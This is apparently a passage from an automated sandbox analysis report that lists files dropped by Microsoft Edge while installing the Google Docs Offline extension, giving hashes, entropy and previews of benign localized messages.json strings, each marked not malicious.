                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                                Malicious:false
